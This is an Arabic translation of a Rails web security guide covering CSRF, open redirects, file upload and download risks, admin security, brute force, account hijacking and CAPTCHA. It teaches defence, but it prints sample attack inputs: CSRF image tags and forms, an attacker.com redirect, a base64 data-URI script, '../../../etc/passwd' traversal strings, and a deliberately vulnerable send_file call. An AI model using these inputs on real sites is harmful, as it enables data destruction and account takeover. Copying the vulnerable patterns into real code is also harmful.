في فصل الجلسات، تعلمت أن معظم تطبيقات ريلز تستخدم جلسات تستند إلى ملفات تعريف الارتباط. إما أن تخزن معرف جلسة العمل في ملف تعريف الارتباط وأن تحتوي على جدول Hash لجلسة من جانب الخادم، أو أن يكون الجدول Hash بأكلمه للجلسة على جانب العميل. في كلتا الحالتين، سيرسل المتصفح تلقائيًا ملف تعريف الارتباط على كل طلب إلى نطاق إذا تمكن من العثور على ملف تعريف ارتباط لهذا النطاق. تكمن النقطة المثيرة للجدل في أنه إذا جاء الطلب من موقع لنطاق مختلف، سيرسل أيضًا ملف تعريف الارتباط. لنبدأ بمثال:

  • يتصفح محمد لوحة الرسائل ويعرض مشاركة من أحد القراصنة (hacker) حيث يوجد عنصر صورة HTML مهيأ. يشير العنصر إلى أمر في تطبيق إدارة مشروع محمد، بدلًا من ملف الصورة نفسها:
    <img src="http://www.webapp.com/project/1/destroy">
    
  • لا تزال جلسة محمد على www.webapp.com على قيد الحياة، لأنه لم يقم بتسجيل الخروج قبل بضع دقائق.
  • من خلال عرض المشاركة، يجد المتصفح وسم الصورة. يحاول تحميل الصورة المشتبه بها من www.webapp.com. كما أوضحنا من قبل، يرسل أيضًا على طول ملف تعريف الارتباط بمعرف الجلسة الصحيح.
  • يتحقق تطبيق الويب على www.webapp.com من معلومات المستخدم في جدول Hash للجلسة المقابلة ويدمر المشروع بالمعرف 1. ثم يعيد صفحة نتائج غير متوقعة للذاكرة، لذا لن تُعرَض الصورة.
  • محمد لا يلاحظ الهجوم - ولكن يكتشف بعد بضعة أيام أن المشروع رقم واحد قد اختفى.

من المهم ملاحظة أن الصورة أو الوصلة الفعلية لا يجب وضعها بالضرورة في نطاق تطبيق الويب، يمكن أن تكون في أي مكان - في منتدى أو مشاركة مدونة أو بريد إلكتروني.

هجمات CSRF نادرةٌ جدًا في CVE (نقاط الضعف والمشاكل الشائعة)، إذ شكلت أقل من 0.1% من الهجمات في عام 2006، ولكنها في الحقيقة "عملاق نائم" (كما وصفها غروسمان[Grossman]). هذا في تناقض صارخ مع نتائج العديد من أعمال الاتفاقيات الأمنية، إذ تعد هجمات CSRF مشكلة أمنية خطيرة يجب الاهتمام بها.

إجراءات CSRF

ملاحظة: أولًا، كما هو مطلوب من قبل W3C، استخدم طلبيات GET و POST بشكل مناسب. ثانيًا، سيحمي رمز الأمان في طلبيات غير GET تطبيقك من هجمات CSRF.

يوفر بروتوكول HTTP أساسًا نوعين رئيسيين من الطلبات هما: GET و POST (يجب استخدام DELETE و PUT و PATCH مثل POST). يوفر World Wide Web Consortium) W3C) قائمة تحقق لاختيار GET أو POST:

استخدم GET إذا كان:

  • التفاعل أشبه بسؤال (بمعنى أنه عملية آمنة مثل الاستعلام أو قراءة العملية أو البحث).

استخدم POST إذا كان:

  • التفاعل أشبه بأمر، أو
  • التفاعل يغير حالة المورد بطريقة يتصورها المستخدم (على سبيل المثال، اشتراك في خدمة)، أو
  • المستخدم يُحمَّل مسؤولية نتائج التفاعل.

إذا كان تطبيق الويب الخاص بك هو RESTful، فقد يُستخدَم لأفعال HTTP إضافية، مثل PATCH أو PUT أو DELETE. ولكن، بعض متصفحات الويب القديمة لا تدعمها بل تدعم فقط GET و POST. يستخدم ريلز الحقل ‎_method المخفي لمعالجة هذه الحالات.

يمكن إرسال طلبات POST تلقائيًا أيضًا. في هذا المثال، يُظهَر الرابط www.harmless.com كوجهة في شريط الحالة للمتصفح. ولكنه في الواقع أنشأ بشكل ديناميكي نموذجًا جديدًا يرسل طلب POST.

<a href="http://www.harmless.com/" onclick="
  var f = document.createElement('form');
  f.style.display = 'none';
  this.parentNode.appendChild(f);
  f.method = 'POST';
  f.action = 'http://www.example.com/account/destroy';
  f.submit();
  return false;">To the harmless survey</a>

أو يضع المهاجم الرمز في معالج الحدث onmouseover الخاص بالصورة:

<img src="http://www.harmless.com/img" width="400" height="400" onmouseover="..." />

هناك العديد من الاحتمالات الأخرى، مثل استخدام الوسم <script> لتقديم طلب عبر الموقع إلى عنوان URL باستخدام استجابة JSONP أو JavaScript. الاستجابة هي تعليمات برمجية قابلة للتنفيذ يمكن للمهاجم العثور على طريقة لتنفيذها، وربما سرقة بيانات حساسة. للحماية من تسرب البيانات هذا، يجب علينا منع الوسم <script> عبر المواقع. ومع ذلك، فإن طلبات Ajax تلتزم بسياسة المتصفح نفسها (فقط يُسمح لموقعك ببدء XmlHttpRequest) حتى نتمكن من السماح لهم بإرجاع استجابات JavaScript بأمان.

ملاحظة: لا يمكننا تمييز أصل الوسم <script> — سواء كان وسمًا على موقعك الخاص أو على موقع ضار آخر — لذا يجب علينا حظر جميع الوسوم <script>، حتى إذا كانت في الأصل آمنةً مثلها مثل الوسوم المحملة من موقعك الخاص. في هذه الحالات، تخطي حماية CSRF بشكل صريح من الإجراءات التي تخدم JavaScript الموجهة للوسم <script>.

للحماية من جميع الطلبات المزورة الأخرى، نقدم رمز الأمان المطلوب الذي يعرفه موقعنا ولكن المواقع الأخرى لا تعرفه. نحن نُضمِّن رمز الأمان في الطلبات ونتحقق منه على الخادم. إليك أحد الأسطر في وحدة تحكم التطبيق الخاص بك، والذي يُضمَّن بشكل افتراضي في تطبيقات ريلز التي أُنشئَت حديثًا:

protect_from_forgery with: :exception

سيتضمن ذلك تلقائيًا رمزًا للأمان في جميع النماذج وطلبات Ajax التي أُنشئت بواسطة ريلز. إذا كان الرمز المميز للأمان لا يطابق ما كان متوقعًا، فسيرمى استثناء.

ملاحظة: بشكل افتراضي، يتضمن ريلز محولًا للشيفرات البرمجية غير المزعجة (unobtrusive scripting adapter)، الذي يضيف ترويسةً تدعى X-CSRF-Token مع رمز الأمان على كل استدعاء Ajax ليس GET. بدون هذه الترويسة، لن تقبل ريلز طلبات Ajax التي ليست GET. عند استخدام مكتبة أخرى لإجراء استدعاءات Ajax، من الضروري إضافة رمز الأمان كعنوان افتراضي لاستدعاءات Ajax في مكتبتك. للحصول على الرمز، ألقِ نظرة على الوسم ‎<meta name='csrf-token' content='THE-TOKEN'>‎ المطبوع بواسطة <‎%= csrf_meta_tags %‎> في عرض التطبيق الخاص بك.

من الشائع استخدام ملفات تعريف الارتباط الدائمة لتخزين معلومات المستخدم، مع cookies.permanent على سبيل المثال. في هذه الحالة، لن تًمسَح ملفات تعريف الارتباط ولن تكون الإجراءات المتبعة للحماية من هجمات CSRF فعالة. إذا كنت تستخدم مخزن ملفات تعريف ارتباط مختلفًا عن الجلسة لهذه المعلومات، فيجب عليك التعامل مع ما تفعله بنفسك:

rescue_from ActionController::InvalidAuthenticityToken do |exception|
  sign_out_user # Example method that will destroy the user cookies
end

يمكن وضع التابع أعلاه في ApplicationController وسيُستدعَى عندما يكون رمز CSRF غير موجود أو غير صحيح على طلب غير GET.

لاحظ أن ثغرات البرمجة عبر المواقع (XSS) تتجاوز جميع إجراءات الحماية من هجمات CSRF. يتيح XSS للمهاجم الوصول إلى جميع العناصر في الصفحة، حتى يتمكن من قراءة رمز الأمان CSRF من نموذج أو إرسال النموذج مباشرةً. سنتطرق إلى هجمات XSS لاحقًا.

إعادة التوجيه والملفات

هناك فئة أخرى من الثغرات الأمنية تحيط باستخدام إعادة التوجيه والملفات في تطبيقات الويب.

إعادة التوجيه

تحذير: إعادة التوجيه في تطبيق الويب هو أداة للتكسير ذات شأن بخس (underestimated cracker tool): لا يمكن للمهاجم توجيه المستخدم إلى موقع يحوي فخًا له فقط، بل قد يؤدي أيضًا إلى إنشاء هجوم قائم بذاته.

عندما يُسمَح للمستخدم بتمرير عنوان URL (أو جزءًا منه) لإعادة التوجيه، فمن المحتمل أن يكون عرضة للخطر. قد يكون الهجوم الأكثر وضوحًا هو إعادة توجيه المستخدمين إلى تطبيق ويب مزيف يبدو تمامًا كالتطبيق الأصلي. هذا الهجوم المزيف يسمى التصيد الاحتيالي (phishing attack) ويعمل عن طريق إرسال رابط غير مريب في رسالة بريد إلكتروني إلى المستخدمين عن طريق إدخال رابط XSS في تطبيق الويب أو وضع الرابط في موقع خارجي. إنه غير مثير للشك، لأنَّ الرابط يبدأ بعنوان URL إلى تطبيق الويب ويخفي عنوان URL للموقع الخبيث في معامل إعادة التوجيه مثل: http://www.example.com/site/redirect?to=www.attacker.com. في ما يلي مثال على إجراء قديم:

def legacy
  redirect_to(params.update(action:'main'))
end

سيؤدي هذا إلى إعادة توجيه المستخدم إلى الإجراء الرئيسي إذا حاول الوصول إلى إجراء قديم. كان الهدف هو الحفاظ على معاملات عنوان URL للإجراء القديم وتمريرها إلى الإجراء الرئيسي. ومع ذلك، يمكن استغلالها من قِبل المهاجم إذا تضمنت مفتاح مضيف في عنوان URL:

http://www.example.com/site/legacy?param1=xy&param2=23&host=www.attacker.com

إذا كان في النهاية عنوان URL، فلن يكون من الممكن ملاحظته ويعيد توجيه المستخدم إلى مضيف attacker.com. سيكون الإجراء المضاد البسيط هو تضمين المعاملات المتوقعة فقط في الإجراء القديم (مرة أخرى نعود إلى أسلوب القائمة البيضاء، بدلًا من إزالة المعاملات غير المتوقعة). وإذا أعدت التوجيه إلى عنوان URL، فتحقق من ذلك باستخدام قائمة بيضاء أو تعبير عادي.

هجمات XSS القائمة بحد ذاتها

هناك عملية إعادة توجيه أخرى تعتمد على هجمات XSS وتعمل في Firefox و Opera باستخدام بروتوكول البيانات. يعرض هذا البروتوكول محتوياته مباشرة في المتصفح ويمكن أن يكون أي شيء من HTML أو JavaScript إلى صور بأكملها:

data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

هذا المثال عبارة عن شيفرة JavaScript مشفرة عبر Base64 تعرض مربع رسالة بسيط. في عنوان URL لإعادة التوجيه، يمكن للمهاجم إعادة التوجيه إلى عنوان URL هذا باستخدام التعليمة البرمجية الضارة فيه. كإجراء مضاد، لا تسمح للمستخدم بتزويد عنوان URL (أو أجزاء منه) المراد إعادة توجيهه إليه.

تحميل الملفات

ملاحظة: تأكد من أن تحميلات ملف لا تستبدل ملفات أخرى مهمة، وعالج ملفات الوسائط (media files) بشكل غير متزامن.

تسمح العديد من تطبيقات الويب للمستخدمين بتحميل ملفات على الخادم. يجب دومًا ترشيح أسماء الملفات، التي قد يختارها المستخدم (جزئيًا)، حيث يمكن للمهاجم استخدام اسم ملف ضار للكتابة فوق أي ملف على الخادم. إذا خزنت الملفات المحملة في ‎/var/www/uploads، وقام المستخدم بإدخال اسم ملف مثل "‎../../../etc/passwd"، فقد يكتب فوق (يستبدل) ملف مهم. بالطبع، سيحتاج مترجم روبي إلى الأذونات المناسبة للقيام بذلك، وهو سبب آخر لتشغيل خوادم الويب و خوادم قواعد البيانات والبرامج الأخرى كمستخدم يونكس ذي صلاحيات أقل.

عند ترشيح أسماء ملفات التي يدخلها المستخدم، لا تحاول إزالة الأجزاء الضارة. فكر في موقف يزيل فيه تطبيق الويب كافة الأجزاء "‎../‎" في اسم الملف ويستخدم المهاجم سلسلة مثل "‎....//‎"، إذ ستكون النتيجة "‎../‎". من الأفضل استخدام أسلوب القائمة البيضاء الذي يتحقق من صحة اسم الملف مع مجموعة من المحارف المقبولة. هذا يعارض نهج القائمة السوداء الذي يحاول إزالة الأحرف غير المسموح بها. في حالة عدم وجود اسم ملف صالح، ارفضه (أو استبدل المحارف غير المقبولة)، ولكن لا تزله. إليك اسم الملف المطهَّر من الإضافة attachment_fu:

def sanitize_filename(filename)
  filename.strip.tap do |name|
    # بشكل صحيح مع مسارات ويندوز على لينكس File.basename ملاحظة: لا يعمل
    # لذا اجلب اسم الملف فقط دون كامل المسار
    name.sub! /\A.*(\\|\/)/, ''
    # أخيرًا، بدل شرطات سفلية مكان المحارف غير الأبجدية أو الرقمية أو  
    # الشرطات السفلية أو النقط 
    name.gsub! /[^\w\.\-]/, '_'
  end
end

هناك عيب كبير في المعالجة المتزامنة لعمليات تحميل الملفات (كما تفعل الإضافة attachment_fu مع الصور) هو ضعفه تجاه هجمات حجب الخدمة (denial-of-service attacks). يمكن للمهاجم بدء تحميل ملفات الصور بشكل متزامن من العديد من أجهزة الكمبيوتر مما يزيد من حمل الخادم وقد يؤدي إلى تعطيل الخادم أو إبطائه.

الحل الأفضل لذلك هو معالجة ملفات الوسائط بشكل غير متزامن: احفظ ملف الوسائط وجدول طلب معالجة في قاعدة البيانات. ستأتي بعدئذٍ عملية أخرى وتعالج الملف في الخلفية.

الشيفرات البرمجية القابلة للتنفيذ في الملفات المحملة

تحذير: قد تُنفَّذ شيفرة مصدرية في الملفات المحملة عند وضعها في مجلدات محددة. لا تضع الملفات المحملة في المجلد public/ لريلز إذا كان هو مجلد Apache الرئيسي.

يحتوي خادم الويب الشهير Apache على خيار يسمى DocumentRoot. هذا هو المجلد الرئيسي لموقع الويب، وسيُخدَّم كل شيء في شجرة هذا المجلد بواسطة خادم الويب. إذا كانت هناك ملفات ذات امتداد (لاحقة) معين، تُنفذ التعليمة البرمجية الموجودة بها عند الطلب (قد يتطلب ذلك تعيين بعض الخيارات). ومن أمثلة ذلك ملفات PHP و CGI. فكر الآن في موقف يُحمِّل فيه أحد المهاجمين ملفًا باسم "file.cgi" يحوي شيفرة فيه تُنفذ عندما يُنزِّل شخص ما الملف.

إذا كان الخيار DocumentRoot في خادم الويب Apache يشير إلى المجلد ‎/public لريلز، فلا تضع الملفات المحملة فيه، بل خزن الملفات في مستوى واحد لأعلى على الأقل.

تنزيل الملفات

ملاحظة: تأكد من عدم تمكن المستخدمين من تنزيل ملفات عشوائية.

مثلما يلزمك ترشيح أسماء الملفات المراد تحميلها، يجب عليك القيام بالأمر ذاته للملفات المراد تنزيلها. يرسل التابع ()send_file ملفات من الخادم إلى العميل. إذا كنت تستخدم اسم الملف الذي أدخله المستخدم، دون تصفية، فسيتمكن المستخدم من تنزيل أي ملف من خادمك:

send_file('/var/www/uploads/' + params[:filename])

ما عليك سوى تمرير اسم ملف مثل "‎../../../etc/passwd" لتنزيل معلومات تسجيل الدخول الخاصة بالخادم. حل هذه المشكلة بسيط وهو التحقق من أن الملف المطلوب موجود في المجلد المتوقع:

basename = File.expand_path('../../files', __dir__)
filename = File.expand_path(File.join(basename, @file.public_filename))
raise if basename !=
     File.expand_path(File.join(File.dirname(filename), '../../../'))
send_file filename, disposition: 'inline'

أسلوب آخر (إضافي) هو تخزين أسماء الملفات في قاعدة البيانات وتسمية الملفات الموجودة على القرص بعد المعرفات الموجودة في قاعدة البيانات. هذا أيضًا طريقة جيدة لتجنب تنفيذ شيفرة برمجية محتملة جرى تحميلها. تسلك الإضافة attachment_fu نفس السلوك أيضًا ولكن بطريقة مشابهة.

الإنترانت والأمان الإداري

الإنترانت (Intranet) والواجهات الإدارية هي أهداف هجوم شائعة، لأنها تسمح بالوصول المُدعَّم بالصلاحيات. على الرغم من أن هذا سيتطلب العديد من التدابير الأمنية الإضافية، فإن العكس هو الحال في العالم الحقيقي.

في عام 2007، كانت هناك أول فيروس طروادة (trojan) المصمَّم خصيصًا لسرقة المعلومات من الإنترانت، وهي موقع الويب الخاص بموقع "مونستر لأرباب العمل" الذي هو Monster.com، وهو تطبيق ويب لتقديم طلبات التوظيف عبر الإنترنت. تعد أحصنة طروادة المصممة خصيصًا لأداء مهمام محددة خبيثة وخطرة نادرة جدًا حتى الآن، والمخاطر منخفضة جدًا، ولكنها بالتأكيد تمثل خطرًا محتملًا ومثالًا على أهمية أمان مضيف العميل أيضًا. ومع ذلك، فإن التهديد الأعلى للتطبيقات الداخلية والإدارة هو الآتي من هجمات XSS و CSRF.

هجمات XSS تتمثَّل بإعادة عرض التطبيق الخاص بك مدخلات المستخدم الضار من شبكة الإكسترانت (extranet)، إذ سيكون آنذاك التطبيق عرضة لهجمات XSS. أسماء المستخدمين، والتعليقات، وتقارير الرسائل غير المرغوب فيها، وعناوين الطلبات هي مجرد أمثلة قليلة غير مألوفة، حيث يمكن أن يكون هناك هجمات XSS.

وجود مكان واحد في واجهة الإدارة أو الإنترانت، حيث لم تُطهَّر المدخلات، يجعل التطبيق بأكمله عرضة للخطر. تشمل عمليات الاستغلال المحتملة سرقة ملف تعريف الارتباط الخاص بالمسؤول، وحقن إطار iframe لسرقة كلمة مرور المسؤول أو تثبيت برامج ضارة من خلال ثغرات أمنية للمتصفح للسيطرة على جهاز الكمبيوتر الخاص بالمشرف.

ارجع إلى قسم الحقن للتعامل مع الإجراءات المضادة لهجمات XSS.

هجمات تزوير الطلب عبر الموقع (اختصارًا CSRF)، التي تعرف أيضا باسم "التزوير المرجعي عبر المواقع" (XSRF اختصار للعبارة Cross-Site Reference Forgery)، هو أسلوب هجوم عملاق يسمح للمهاجم بالقيام بكل شيء قد يفعله المسؤول أو مستخدم الإنترانت. كما سبق أن رأينا أعلاه كيف يعمل CSRF، إليك بعض الأمثلة لما يمكن أن يفعله المهاجمون في واجهة الإنترانت أو الواجهة الإدارية.

مثال حقيقي هو إعادة ضبط الموجه (router) بواسطة CSRF. أرسل المهاجمون بريدًا إلكترونيًا ضارًا، يحوي CSRF، إلى المستخدمين المكسيكيين. زعم البريد الإلكتروني أن هناك بطاقة إلكترونية في انتظار المستخدم، ولكنها احتوت أيضًا على وسم صورة أدت إلى طلب HTTP-GET لإعادة ضبط موجه المستخدم (وهو نموذج مشهور في المكسيك). غيَّر الطلب إعدادات نظام أسماء النطاقات (DNS) بحيث تعين طلبات موقع المصارف التي مقرها في المكسيك لموقع المهاجم. كل من وصل إلى الموقع المصرفي من خلال ذلك الموجه رأى موقع المهاجم المزيّف على شبكة الإنترنت وسرقت أمواله.

مثال آخر جرى فيه تغيير عنوان البريد الإلكتروني وكلمة مرور لحساب Google Adsense. إذا سُجل الضحية في جوجل أدسنس ودخل إلى واجهة الإدارة لحملات إعلانات جوجل، يستطيع المهاجم آنذاك من تغيير اعتماديات الضحية.

هناك هجوم شائع آخر هو إرسال بريد إلكتروني غير مرغوب فيه إلى تطبيق الويب الخاص بك أو مدونتك أو المنتدى الخاص بك لنشر XSS ضار. بالطبع، يجب على المهاجم معرفة بنية عنوان URL، ولكن معظم عناوين URL في ريلز واضحة تمامًا أو يسهل اكتشافها خصوصًا إذا كانت الواجهة الإدارية للتطبيق مفتوح المصدر. قد يخمن المهاجم 1000 تخمين محظوظ فقط من خلال تضمين وسوم IMG الخبيثة التي تحاول إجراء كل تركيب ممكن.

للتدابير المضادة ضد هجمات CSRF في الواجهات الإدارية والتطبيقات الإنترانت، ارجع إلى التدابير المضادة في قسم CSRF.

الاحتياطات الإضافية

تعمل واجهة الإدارة العامة بالشكل التالي: إنها موجودة على www.example.com/admin، ولا يمكن الوصول إليها إلا إذا ضُبطت الراية admin في النموذج User، وتعيد عرض مدخلات المستخدم وتسمح للمشرف بحذف أو إضافة أو تعديل أي شيء من البيانات المطلوبة. إليك بعض الأفكار حول هذا الأمر:

  • من المهم جدًا التفكير في أسوأ الحالات: ماذا لو كان شخص ما قد احتفظ بملفات تعريف الارتباط أو بيانات اعتماد المستخدم. يمكنك تقديم أدوار للواجهة الإدارية للحد من إمكانيات المهاجم. وماذا عن بيانات اعتماد تسجيل الدخول الخاصة لواجهة الإدارة، بخلاف تلك المستخدمة للجزء العام من التطبيق. أو كلمة مرور خاصة لاتخاذ إجراءات خطيرة للغاية؟
  • هل يجب على المشرف حقًا الوصول إلى الواجهة من كل مكان في العالم؟ نفكر في الحد من تسجيل الدخول إلى مجموعة من عناوين IP المصدر. افحص request.remote_ip لمعرفة عنوان IP للمستخدم. هذه ليست واقية من الرصاص، ولكن تعد حاجزًا كبيرًا يقي من جهمات عديدة. تذكر أنه قد يكون هناك وسيط (proxy) قيد الاستخدام.
  • ضع واجهة الإدارة على نطاق فرعي خاص مثل admin.application.com واجعله تطبيقًا منفصلًا مع إدارة المستخدم الخاصة به. هذا يجعل سرقة ملف تعريف ارتباط المستخدم المسؤول من النطاق المعتاد، www.application.com، مستحيلًا. هذا بسبب سياسة المصدر الواحد (same origin policy) في المتصفح الخاص بك: قد لا تقرأ الشيفرة البرمجية التي حُقنَت (XSS) على www.application.com ملف تعريف الارتباط لـ admin.application.com والعكس بالعكس.

إدارة المستخدم

ملاحظة: يجب أن يتعامل كل تطبيق ويب تقريبًا مع التفويض والاستيثاق. وبدلًا من أن تتجول بنفسك، من المستحسن استخدام المكونات الإضافية الشائعة. ولكن ابقهم محدثين أيضًا. يمكن أن تؤدي بعض الاحتياطات الإضافية إلى جعل تطبيقك أكثر أمانًا.

هناك عدد من الإضافات المتاحة للاستيثاق في ريلز. منها الجيد، مثل الإضافة devise و authlogic المشهورتين، التي تخزن فقط كلمات المرور المشفرة، وليس كلمات المرور ذات النص العادي. في الإصدار 3.1 من ريلز، يمكنك استخدام التابع has_secure_password المضمّن الذي يحتوي على ميزات مشابهة.

يحصل كل مستخدم جديد على رمز تنشيط لتفعيل حسابه عندما يتلقى رسالة إلكترونية تحتوي على رابط التنشيط فيه. بعد تنشيط الحساب، تعين الحقول activation_code إلى القيمة NULL في قاعدة البيانات. إذا طلب شخص ما عنوان URL كهذا، يُسجل دخوله كأول مستخدم نشط موجود في قاعدة البيانات (ومن المحتمل أن يكون هذا هو المسؤول):

http://localhost:3006/user/activate
http://localhost:3006/user/activate?id=

هذا ممكن لأنه على بعض الخوادم، بهذه الطريقة، يكون معرف المعامل، كما هو الحال في [params[:id، القيمة nil. ومع ذلك، إليك الباحث عن إجراء التنشيط:

User.find_by_activation_code(params[:id])

إذا كان المعامل nil، فسيكون استعلام SQL الناتج:

SELECT * FROM users WHERE (users.activation_code IS NULL) LIMIT 1

وبالتالي وجد أول مستخدم في قاعدة البيانات، و أعاده وسجله. يمكنك معرفة المزيد عنه في هذا المنشور. من المستحسن تحديث الإضافات من وقت لآخر. علاوة على ذلك، يمكنك مراجعة طلبك للعثور على المزيد من العيوب على هذا النحو.

الحسابات المتعرضة لهجوم عنيف

ملاحظة: هجمات القوة الغاشمة (يطلق عليه أيضًا "هجمات تخمين اسم المستخدم وكلمة المرور" [Brute force attacks]) في الحسابات هي هجمات تجريبية وأخطاء على بيانات اعتماد تسجيل الدخول. صدهم مع المزيد من رسائل الخطأ العامة وربما تتطلب إدخال اختبار CAPTCHA.

قد يُساء استخدام قائمة بأسماء المستخدمين لتطبيق الويب الخاص بك لفرض كلمات المرور المقابلة، لأن معظم الأشخاص لا يستخدمون كلمات مرور معقدة. معظم كلمات المرور هي مزيج من كلمات موجودة في القاموس وربما أرقام بسيطة. مع التسلح بقائمة من أسماء المستخدمين ووجود قاموس، قد يعثر برنامج تلقائي على كلمة المرور الصحيحة لمستخدم في غضون دقائق.

وبسبب هذا، فإن معظم تطبيقات الويب تعرض رسالة خطأ عامة مثل "اسم المستخدم أو كلمة المرور غير صحيحة" (user name or password not correct)، إذا كان أحدها غير صحيح. فلو قيل لك "لم يعثر على اسم المستخدم الذي ادخلته"، يمكن للمهاجم تلقائيًا تجميع قائمة بأسماء المستخدمين.

ومع ذلك، ما الذي يهمله معظم مصممي تطبيقات الويب هو صفحات نسيان كلمة المرور. تعترف هذه الصفحات غالبًا بأن اسم المستخدم أو عنوان البريد الإلكتروني الذي أُدخِل لم يعثر عليه. هذا يسمح للمهاجم بتجميع قائمة بأسماء المستخدمين وشن هجوم عنيف على تلك الحسابات المجمعة.

للتخفيف من مثل هذه الهجمات، اعرض رسالة خطأ عامة على صفحات نسيت كلمة المرور أيضًا. علاوة على ذلك، يمكنك طلب إدخال اختبار كاباتشا (CAPTCHA) بعد عدد من عمليات تسجيل الدخول الفاشلة من عنوان IP معين. ومع ذلك، لاحظ أن هذا ليس حلًا مضادًا للرصاص ضد البرامج التلقائية، لأن مثل هذه البرامج قد تغير عنوان IP الخاص بها تمامًا كما هو الحال دائمًا. ومع ذلك، فإنه يمثِّل حاجزًا جيدًا لصد جزء من الهجوم.

اختطاف الحساب

تسهِّل العديد من تطبيقات الويب اختطاف حسابات المستخدمين. لماذا لا تكون مختلفة وتجعلها أكثر صعوبة؟

كلمات المرور

فكر في الموقف الذي سرق فيه أحد المهاجمين ملف تعريف ارتباط جلسة المستخدم، ومن ثم تمكنه من استخدام التطبيق. إذا كان من السهل تغيير كلمة المرور، سيختطف المهاجم الحساب بنقرات قليلة. أو إذا كان نموذج تغيير كلمة المرور عرضة لهجمات CSRF، سيغير المهاجم كلمة المرور الخاصة بالضحية عن طريق إغرائه إلى دخول صفحة ويب تحتوي على وسم IMG صُمم باستخدام CSRF. كإجراء مضاد، تأكد من أن نماذج كلمة مرور التغيير آمنة ضد هجمات CSRF، بالطبع. واطلب من المستخدم إدخال كلمة المرور القديمة عند تغييرها.

البريد الإلكتروني

ومع ذلك، قد يسيطر المهاجم أيضًا على الحساب عن طريق تغيير عنوان البريد الإلكتروني. بعد تغييرها، ينتقل المهاجم إلى صفحة كلمة المرور المنسية ويطلب تغيير كلمة المرور. تُرسَل بعد ذلك كلمة المرور (قد تكون الجديدة) إلى عنوان البريد الإلكتروني للمهاجم. كإجراء مضاد، يطلب من المستخدم إدخال كلمة المرور عند تغيير عنوان البريد الإلكتروني أيضًا.

الآخرى

اعتمادًا على تطبيق الويب الخاص بك، قد يكون هناك المزيد من الطرق لاختطاف حساب المستخدم. في العديد من الحالات، يساعد CSRF و XSS في القيام بذلك. على سبيل المثال، كما هو الحال في ثغرة CSRF في Google Mail. في هجوم إثبات المفهوم هذا، كان الضحية قد أغري إلى دخول موقع ويب يسيطر عليه المهاجم. في هذا الموقع عبارة عن وسم <img> ينتج عنه طلب HTTP GET يغير إعدادات مرشح Google Mail. إذا سجل الضحية في Google Mail، سيغير المهاجم المرشحات لإعادة توجيه جميع رسائل البريد الإلكتروني إلى عنوان البريد الإلكتروني الخاص به. ضرر ذلك يماثل ضرر اختطاف الحساب بالكامل. كتدبير مضاد، راجع منطق التطبيق الخاص بك وأزل كل ثغرات XSS و CSRF.

الكابتشا

ملاحظة: اختبار الكابتشا (CAPTCHA) هو اختبار تحدي استجابة لتحديد أن الاستجابة لا تُنشَأ بواسطة جهاز آلي (حاسوب أو برنامج آلي). وغالبًا ما يستخدم لحماية نماذج التسجيل من المهاجمين ونماذج التعليقات من برامج التتبع العشوائية التلقائية عن طريق مطالبة المستخدم بكتابة حروف صورة مشوهة. هذا هو اختبار كابتشا الإيجابي، ولكن هناك أيضًا اختبار كابتشا السلبي. إن فكرة اختبار كابتشا السلبي ليس لاثبات أن المستخدم الحالي هو إنسان، ولكن لاكتشاف أن المستخدم الحالي هو إنسان آلي (robot).

واجهة برمجة تطبيقات كابتشا الإيجابية الشائعة هي reCAPTCHA التي تعرض صورتين مشوهتين للكلمات من كتب قديمة. كما أنه يضيف خطًا مائلًا، بدلًا من خلفية مشوهة ومستويات عالية من التشويش على النص كما كان يُفعَل في اختبار كابتشا سابقًا، لأن الأخير قد تعطل. كمكافأة، يساعد استخدام reCAPTCHA في تحويل الكتب القديمة إلى رقمية. ReCAPTCHA هو أيضًا إضافة في ريلز يحمل نفس اسم واجهة برمجة التطبيقات.

ستحصل على مفتاحين من واجهة برمجة التطبيقات (API)، عام ومفتاح خاص؛ يجب عليك وضعه في بيئة ريلز لديك. بعد ذلك يمكنك استخدام التابع recaptcha_tags في الواجهة، و verification_recaptcha في وحدة التحكم. سيعيد Verify_recaptcha خطأ إذا فشل التحقق من الصحة. المشكلة التي تكمن في كابتشا هي أن لها تأثيرًا سلبيًا على تجربة المستخدم. بالإضافة إلى ذلك، وجد بعض المستخدمين المعاقين بصريًا أن بعض أنواع اختبارات كابتشا المشوهة يصعب قراءتها. ومع ذلك، تعد اختبارات كابتشا الإيجابية إحدى أفضل الطرق لمنع جميع أنواع برامج التتبع من إرسال النماذج.

معظم البرامج الآلية الذكية (bots) غبية حقًا. إنها تزحف على الويب وتضع بريدها الإلكتروني غير المرغوب فيه في كل حقل يمكنها العثور عليه. تستفيد اختبارات كابتشا السلبية من ذلك وتُضمِّن حقلًا يدعى "honeypot" في النموذج بشكل مخفي عن المستخدم البشري من خلال خاصية CSS أو JavaScript كفخٍ للبرامج الآلية التي تدعى أنها ذكية.

تجدر الإشارة إلى أنَّ اختبار كابتشا السلبي لا يكون فعالًا إلا ضد برامج التتبع الآلية المغفلة (dumb bots) ولا يكفي لحماية التطبيقات المهمة من برامج التتبع المستهدفة الآلية. ومع ذلك، يمكن الجمع بين اختبار كابتشا السلبي والإيجابي لزيادة الأداء؛ على سبيل المثال، إذا لم يكن الحقل "honeypot" فارغًا (أي ملأه البرنامج الآلي)، لن تحتاج إلى التحقق من اختبار كابتشا الإيجابي، والذي يتطلب طلب HTTPS إلى Google ReCaptcha قبل حساب الاستجابة.

فيما يلي بعض الأفكار حول كيفية إخفاء حقول honeypot بواسطة JavaScript و / أو CSS:

  • ضع الحقول خارج المنطقة المرئية من الصفحة.
  • اجعل حجم العناصر صغيرة جدًا أو لونها بنفس خلفية الصفحة.
  • اترك الحقول مرئية، ولكن أخبر البشر بتركها فارغة.

يعتبر اختبار كابتشا السلبي الأكثر بساطة هو حقل honeypot مخفي واحد. على جانب الخادم، ستتحقق من قيمة الحقل؛ فإذا كان يحتوي على أي نص، فيجب أن يكون عبارة عن برنامج تتبع. بعد ذلك، يمكنك إما تجاهل المشاركة أو إظهار نتيجة إيجابية، ولكن لا يمكنك حفظ المشاركة في قاعدة البيانات. بهذه الطريقة سوف يكون البرنامج الآلي راضيًا ويمضي قدمًا.

يمكنك العثور على اختبارات كابتشا سلبية أكثر تعقيدًا في هذه التدوينة لـ Ned Batchelder:

  • ضمِّن حقلًا مع الطابع الزمني UTC الحالي فيه وتحقق من ذلك على الخادم. إذا كان بعيدًا جدًا في الماضي، أو إذا كان في المستقبل، فإن النموذج غير صالح.
  • اجعل أسماء الحقول عشوائية.
  • ضمن أكثر من حقل honeypot من جميع الأنواع، بما في ذلك أزرار الإرسال.

